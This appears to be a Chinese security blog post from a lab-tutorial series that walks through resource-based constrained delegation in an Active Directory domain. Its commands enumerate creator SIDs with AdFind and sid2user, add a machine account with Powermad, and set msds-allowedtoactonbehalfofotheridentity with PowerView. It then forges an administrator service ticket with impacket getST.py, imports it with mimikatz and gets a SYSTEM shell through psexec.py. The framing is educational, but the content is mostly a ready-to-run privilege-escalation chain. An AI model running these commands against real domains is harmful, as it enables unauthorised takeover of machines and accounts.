第136天:内网安全-横向移动&资源约束委派

xiaojiesec2024-08-27 17:03

利用条件

首先是dc域控主机必须是win2012以上的主机

其次是域内有一个账户,可以同时登录两台主机

利用 jie 可以登录 win2008 也可以登录 win7

资源委派不需要设置委派,默认即可

实验复现

复现环境

通过网盘分享的文件:136-xiaodi.local内网域环境镜像文件

链接: https://pan.baidu.com/s/1H3ypkEoTiJMbwfMxJ7JMCA?pwd=wnra 提取码: wnra

这里在本地复现,cs中操作时一致的

使用adfind工具查询域内是否有SID一致的主机,并获取主机名

复制代码 
AdFind.exe -h DC的ip -b "DC=域,DC=控" -f "objectClass=computer" mS-DS-CreatorSID
AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

要利用资源委派就得知道这个用户是谁,根据这个sid,利用工具sid2user.exe去查询用户名,需要删除sid的s-1以及后面的所有横杠

复制代码 
sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

那么如果你拿到的就是dbadmin用户,就可以利用该账户从web渗透到dc,没拿到就得想办法去获取这个用户

利用这个工具去执行下面的攻击

https://gitcode.com/gh_mirrors/po/Powermad/overview?utm_source=csdn_github_accelerator&isLogin=1

添加机器

Set-ExecutionPolicy Bypass -Scope Process ##设置允许执行脚本

import-module .\Powermad.ps1 ##导入模块

New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的,然后密码是123456

执行完成以后域控内有一个test1主机

获取新主机的sid值

Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\PowerView.ps1

Get-NetComputer test1 -Properties objectsid

修改目标主机的属性

Set-ExecutionPolicy Bypass -Scope Process

import-module .\powerview.ps1

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)" ##(刚才获得的sid值)

SDBytes = New-Object byte\[\] (SD.BinaryLength)

SD.GetBinaryForm(SDBytes, 0)

Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose ##(DATA是攻击的目标主机)

检验是否配置成功

复制代码 
Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

这个时候就可以生成票据去执行后续操作了,由于需要用到python程序,所以这里我还是用cs上线生成sockets代理

利用impack套件里面的getst.py获得票据,这里生成票据的时候不管你是再本地还是在代理都要记得设置hosts文件,否则无效

复制代码 
proxychains4 python getST.py -dc-ip 192.168.3.33 xiaodi.local/test1\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

生成了一个票据,上传到服务器,利用mimikatz导入票据

复制代码 
mimikatz kerberos::ptc administrator.ccache

再访问

提升权限

复制代码 
python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass   ##可提升为system权限。
相关推荐
开开心心_Every3 小时前
解决打印机共享难题的实用工具
linux·b树·安全·游戏·随机森林·pdf·计算机外设
ylscode5 小时前
HexStrike AI v6.0 深度解析:MCP协议驱动的网络安全自动化框架与红队规避实战
网络·人工智能·安全·安全威胁分析
ylscode6 小时前
ChatGPT新增锁定模式,以缓解提示注入和数据泄露攻击
人工智能·安全·ai·安全威胁分析
博客zhu虎康6 小时前
小程序:UGC自定义发布内容接入微信公众平台内容安全API(imgSecCheck、msgSecCheck、mediaCheckAsync)
安全·小程序·微信公众平台
黎阳之光科技管控6 小时前
纯视觉定位赋能海关口岸 无感通关提升国门安全与效率
算法·安全
paul_chen217 小时前
CentOS 8 LVM 在线扩容根分区:从 home 安全割让空间(XFS 文件系统)
linux·安全·centos
国科安芯7 小时前
商业航天级抗辐照全双工RS-485/RS-422收发器ASM491S2Y的技术特性与应用研究
运维·网络·单片机·嵌入式硬件·安全·架构·安全性测试
txg6667 小时前
网络安全领域简报(2026年5月31日—6月7日)
安全·web安全·网络安全
j_xxx404_8 小时前
Linux线程池硬核解析:从固定线程池、单例线程池到线程安全、死锁与锁模型|附源码
linux·运维·服务器·c++·安全·ai
国科安芯8 小时前
ASP7A84AS高精度抗辐照线性稳压器技术特性与应用分析
单片机·嵌入式硬件·安全·架构
热门推荐
01【AI】2026 年具身智能模型和世界模型总结02GitHub 镜像站点032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04Codex 下载安装指南:Windows 和 macOS 官方版下载05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06CC-Switch & Claude 基于 Linux 服务器安装使用指南07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08CC-Switch 下载、安装与使用配置指南【2026.5.29】092026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?10AI科技热点日报 | 2026年6月1日